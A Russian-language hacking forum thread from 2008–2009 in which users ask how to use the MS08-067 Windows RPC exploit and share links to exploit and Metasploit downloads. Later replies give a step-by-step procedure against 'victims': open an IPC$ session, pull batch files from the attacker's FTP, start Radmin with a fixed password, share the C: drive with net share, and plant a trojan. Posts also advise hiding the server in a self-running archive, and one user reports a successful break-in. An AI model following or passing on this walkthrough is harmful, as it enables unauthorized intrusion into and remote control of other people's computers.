Как пользоватся эксплоитом MS08-067
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Как пользоватся эксплоитом MS08-067 - 2008-10-26 20:59:35.056666
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Кто нить подскажите как пользоватся эксплоитом MS08-067
каторый можно скачать здесь http://www.securitylab.ru/_download/exploits/2008/10/2008-ms08-067.zip
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-27 02:56:09.473333
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Кто нибудь пдскажите как пользоватся ???
Как я понимаю это DoS атака(отказование в обслужавание (идёт на порт 139,135,445.)через CMD)
Как я понимаю надо пописать в cmd путь к файлу .бат и ip и порт на каторый идёт атака(как в превидуших эксплойтах (ms04011-lsasrv),(MS03-039))
А после этого надо коннэктится через телнет или катнет к указонному порту
Если я так понял атака должна идти на уезвимость RPC этих портов???
ТОЛЬКО ЧЁТО НЕЧЁ НЕ ПОЛУЧАЕТСЯ !!!
!!!!Если кто знает как это надо правильно делать расскажите плиз!!!!!!
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-27 13:08:46.173333
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
А по русски можно ?
Я это переводил какаета ерунда получается так и не понял?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-27 13:31:42.040000
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Короче как я понял в консоли надо указать путь к файлу .bat и потом \\IPADDRESS\IPC$ /user:user creds
И у меня пишет вот чё : "сl" не является внутреней или внешней камандой, используемой праграмой или пакетным файлом.
Помогите разобратся?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-27 16:52:41.760000
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Я понял надо просто надо правильно настроить бат фаил
Но чёто не получается каму не сложно подскажите как правильно надо всё там прописать???
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-28 10:51:04.616666
|
|
|
Mekom
Сообщений: 23
Оценки: 0
Присоединился: 2008-07-10 15:23:24.323333
|
http://www.securitylab.ru/_download/exploits/2008/10/2008-MS08-067-universal.rar
скомпилированный сплойт
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-28 11:15:16.640000
|
|
|
kroppand
Сообщений: 1
Оценки: 0
Присоединился: 2008-10-28 11:09:33.356666
|
А как на счет того, чтобы Уголовный кодекс сперва почитать?!
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-28 12:35:25.370000
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
Mekom ты ещё гуй прикрути для полного счастья >;EЭ
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-29 12:48:13.196666
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Попробовал уневерсал всё ништяк.
А некто не знает через чё потом лучше конектится?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-29 16:54:02.350000
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Чёто непойму как конектится и к какому порту?
Исли не трудно помогите пожалуста!!!
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-29 17:18:00.360000
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Может ктонибудь видео выложит по использованию сплойта?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-29 19:36:24.883333
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Никак не пойму как после таво как проэксплойтел комп что нодо делать дальше?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-29 20:58:21.523333
|
|
|
merz0nax
Сообщений: 203
Оценки: 0
Присоединился: 2008-10-15 18:38:46.480000
|
блин ты можешь просто редактирвоать сообщение???
quote:
Никак не пойму как после таво как проэксплойтел комп что нодо делать дальше?
почитать ЗДЕСЬ думаю вопросов больше не возникнет.
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-29 21:38:16.476666
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
quote:
почитать ЗДЕСЬ думаю вопросов больше не возникнет.
Чёто не понял нечего? можно по подробней?
А надо подключатся через команду net use \\ip\C$ и требует пароль а где его взять?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-10-31 15:48:10.870000
|
|
|
Dr.James
Сообщений: 250
Оценки: 0
Присоединился: 2007-10-27 16:08:24.420000
|
quote:
ORIGINAL: Maks585
quote:
почитать ЗДЕСЬ думаю вопросов больше не возникнет.
Чёто не понял нечего? можно по подробней?
тебя научить читать? ты в школе учился?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-11-01 14:08:24.976666
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
quote:
А надо подключатся через команду net use \\ip\C$quote:
тебя научить читать? ты в школе учился?
Там этого не написано.
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-11-01 14:20:09.730000
|
|
|
CeNT
Сообщений: 201
Оценки: 0
Присоединился: 2007-12-25 14:35:58.483333
|
Забей на бред этот
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-11-01 22:30:35.943333
|
|
|
merz0nax
Сообщений: 203
Оценки: 0
Присоединился: 2008-10-15 18:38:46.480000
|
quote:
Чёто не понял нечего? можно по подробней?
А надо подключатся через команду net use \\ip\C$ и требует пароль а где его взять?
ты к какому порту конектился?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-11-02 01:00:14.266666
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
quote:
ты к какому порту конектился?
Когда это пишеш net use \\ip\C$
порт не надо указывать
и пишет введите логин и пароль.
(но к \\ip\ipc$ создаётся автоматически как проэксплойтил комп
только я не пойму что это даёт(\\ip\ipc$))
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-11-07 14:28:08.740000
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Я поискал по гуглу и нашёл что MS08-067 биндит порт 4444
Но когда я пробую ну всё пишет ОК типа можно подключатся я сканирую тот комп на открытыи порты
а там открыты только 135,445(сканил с помошью IP-tools)
И ещё смотрю в ip-tools в меню connections а там написано: TCP мой ip прот(от 3000 до 4000 при новой попытки постоянно разный) ip того компа порт 445
Типа я приконекчен тому компу но порт 445(ну это как я понял типа это соединение net use \\ip\ipc$)
Ещё пробовал снифером вычеслить создал две вертуальные машины
ну снифер показывает что MS08-067 точно биндит порт но запрос о бинде идёт на порт 135(emap)
(19 46.325195 ip ip DCERP Bind_ack: call_id: 0 accept max_xmit: 5840 max_recv: 5840 135(emap)
а потом: 21 46.890625 ip ip REMACT RemoteActivation request CLSID=NULL IID[1]=IUnknown
и там: ProtSeqs: NCACN_IP_TCP (7) )
Типа коннктится netcat на порт 135 как я понял но не конектится.
[Им хоть раз кто нибудь пользовался ?]
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-12-05 18:12:43.386666
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
Вот видео как пользоватся эксплоитом вот ссылка:
http://depositfiles.com/files/4rs5x037f
Вот сам рабочий метасплоит:
http://depositfiles.com/files/jhsnwc2lq
Вот прога которая поверяет на уезвимость pt-ms08-065-067(ru):
http://depositfiles.com/files/ahw8x7w81
Вот и сам Радмин с RPC GUI v2 - r3L4x для ФТП
http://depositfiles.com/files/srtqatvwd
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2008-12-05 20:25:30.593333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
А теперб тоже самое, только на нормальмом файлообменнике. Депозиты не приветствуются зде.
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-06 12:24:35.880000
|
|
|
DrShaman
Сообщений: 50
Оценки: 0
Присоединился: 2009-01-06 11:09:07.876666
|
Вот у меня IP:4444 Shell поевляется в метасплойте я на него щёлкаю поевляется это белое окошечко а в нём нету нечего.. нету приглашения винды и C:\WINDOWS\SYSTEM32 нету строчки, кароче нечего немагу зделать, и такое на всех.. Что может быть ? Может я что не так делаю, чтонить забыл может )
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-15 08:00:36.700000
|
|
|
Sabotazhnik
Сообщений: 4
Оценки: 0
Присоединился: 2007-10-16 14:43:37.020000
|
Блин у меня такая заковырка. Всё в норме как по видео Maks585, но когда надо с ftp залить файлы на тачку, то после коннекта на мой ftp и надписи USER Welcome, на видео видно, что делается что-то ещё и в консоле появляется строка ftp xxx.xxx.xxx.xxx БЕЗ НАДПИСИ (none)) , так что нужно там нажать после USER Welcome, ??? потому что мне кажется именно по этому у меня после заливки первого батника больше ничего не скачивается на тачку жертвы.
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-16 12:56:38.090000
|
|
|
Sabotazhnik
Сообщений: 4
Оценки: 0
Присоединился: 2007-10-16 14:43:37.020000
|
Ну ктонить подскажите, что я не так делаю??? Очень надо!!!
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-16 21:38:25.100000
|
|
|
DzumO
Сообщений: 60
Оценки: 0
Присоединился: 2008-12-25 21:48:35.483333
|
quote:
ORIGINAL: kroppand
А как на счет того, чтобы Уголовный кодекс сперва почитать?!
Ну и уголовный кодекс, да крутая книга, да посадить могут, так зачем ты тут тусиш вообще?
Многие ложат большой и толстый на сей манускрипт правил жизни, да ребята неправы, но что поделаешь? Всех не переловишь да и в качестве флуда твое сообщение невтемное)
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-17 03:18:24.030000
|
|
|
DrShaman
Сообщений: 50
Оценки: 0
Присоединился: 2009-01-06 11:09:07.876666
|
kroppand,
Ты так сказал это кагбутто после этого все бросят и сайт этот и занятие своё))
98% что ты был в нетрезвом или наркотическом састоянии когда писал это ))
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-17 16:14:17.276666
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
quote:
Блин у меня такая заковырка. Всё в норме как по видео Maks585, но когда надо с ftp залить файлы на тачку, то после коннекта на мой ftp и надписи USER Welcome, на видео видно, что делается что-то ещё и в консоле появляется строка ftp xxx.xxx.xxx.xxx БЕЗ НАДПИСИ (none)) ,
Если ты не уберал имя юзера asdf то в этой строке надо ввести имя и нажать Enter.
А если ты уберал имя то просто Enter
А потом кнопка верх чтоб появилась надпись ftp xxx.xxx.xxx.xxx потом выделяеш эту надпись и пишеш get 111.bat "Enter"
Потом вверх и опять выделяеш и пишеш и так пока всё не зальёш
А на RPC GUI v2 - r3L4x должно быть написано что файлы все залились
И пишеш by должно появится командная строка инадо запустить фаил 111.bat
И канектишся радмином пароль 123456789
Вот и всё !!!!:)
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-18 06:20:58.960000
|
|
|
Sabotazhnik
Сообщений: 4
Оценки: 0
Присоединился: 2007-10-16 14:43:37.020000
|
Maks585 - Спасибо дружище.!!! Блин ну уже всё перепробовал, а тут всего лишь вверх нажать надо было… Как на зло сетку вырубили, а мне проверить надо. Я так понял антивири эти файлы не видят, мой НОД32 молчит и всеми любимый Каспер тоже!!! Будем надеятся, что всё пройдет.
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-20 04:36:36.143333
|
|
|
kamch
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-20 01:57:16.150000
|
Maks585 помогло все… тока мне фтп поднять как кинь прогу в паблик
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-20 05:29:49.646666
|
|
|
kamch
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-20 01:57:16.150000
|
а все глаза разул увидел…
кароче ломанул втпшник….
все получилось…
еще будут примеры как с сайтом ченить натворить???? чьим нибудь?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-20 20:15:31.373333
|
|
|
kamch
Сообщений: 3
Оценки: 0
Присоединился: 2009-01-20 01:57:16.150000
|
подскажите … как через командную строку открыть доступ на папку на просмтор на запись..
я делаю так net share rrr$=c:\ к диску доступ открывается я внутри….
а как по папкам дальше пройти…. пишет что доступ закрыт….
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-01-21 16:27:42.433333
|
|
|
Maks585
Сообщений: 25
Оценки: 0
Присоединился: 2008-09-18 14:36:55.136666
|
quote:
подскажите … как через командную строку открыть доступ на папку на просмтор на запись..
я делаю так net share rrr$=c:\ к диску доступ открывается я внутри….
а как по папкам дальше пройти…. пишет что доступ закрыт….
А зачем тебе это просто радмин залей по проше будет
quote:
тока мне фтп поднять как кинь прогу в паблик
Вот порога RPC GUI v2 - r3L4x чтоб фтп поднять на своем компе.
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-02-19 20:05:46.340000
|
|
|
rewiaca
Сообщений: 8
Оценки: 0
Присоединился: 2009-02-19 02:35:33.933333
|
а вот этот радмин сервер который мы запускаем на компе жертвы.. это просто мы открываем радминский порт и доступ к нему? а как закрыть? и видно ли в процессах?
и можноли засунуть его в архив чтобы он куда-нить распаковывался и сразу запускался? и если это попадёт к пользователю локальной сети, где один айпи на всех в инете.. тогда не выйдет?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-02-20 23:39:22.950000
|
|
|
L2nkeR
Сообщений: 115
Оценки: 0
Присоединился: 2009-02-02 04:03:17.786666
|
Запускаеться на машине жертвы и запускает спешал сервис, который держит прослушывание на порту. Для доступа как обычно указыветься дефолтный пароль (желательно,ибо не один ты хочеш показать свое кибермогуществом над жертвой). Закрываетсо убийством сервиса в риалтайме, в процах видна оболочка и ядро. Создай sfx-архив с авто- распаковкой и запуском.
С локалкой также…
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-02-21 09:36:01.366666
|
|
|
dimon20
Сообщений: 4
Оценки: 0
Присоединился: 2009-02-20 06:50:26.066666
|
У меня нет возможности скачать видео (скорость инета желает лучшего). Напишите пожалуйста как пошариться на С: и залить туда троя. Я проэксплойтил жертву и выполнил net use \\***.***.***.***\IPC$ /user:user а как дальше?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-02-21 17:26:49.126666
|
|
|
L2nkeR
Сообщений: 115
Оценки: 0
Присоединился: 2009-02-02 04:03:17.786666
|
в удаленной консоли пишеш
net share [G]=[c]:
где [g] - любая буква, которая назначется сетевым диском,
[с] - локалка на удаленном компе, которую нада розшарить.
Далее входиш в соединения и видиш там диск G с содержимым диска C удаленки;
для закачки
copy [disk1](локалка) [disk2](удаленка) …
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-02-22 05:51:17.596666
|
|
|
dimon20
Сообщений: 4
Оценки: 0
Присоединился: 2009-02-20 06:50:26.066666
|
а можно по подробней, как открыть удалённую консоль, что-б там написать net share?
|
|
|
|
|
RE: Как пользоватся эксплоитом MS08-067 - 2009-02-22 12:46:39.856666
|
|
|
SEWERN
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-30 20:00:20.276666
|
quote:
ORIGINAL: Maks585
Кто нить подскажите как пользоватся эксплоитом MS08-067
каторый можно скачать здесь http://www.securitylab.ru/_download/exploits/2008/10/2008-ms08-067.zip
полное описание бага и как его юзать . http://forum.antichat.ru/thread99665.html
|
|
|
|
|
|
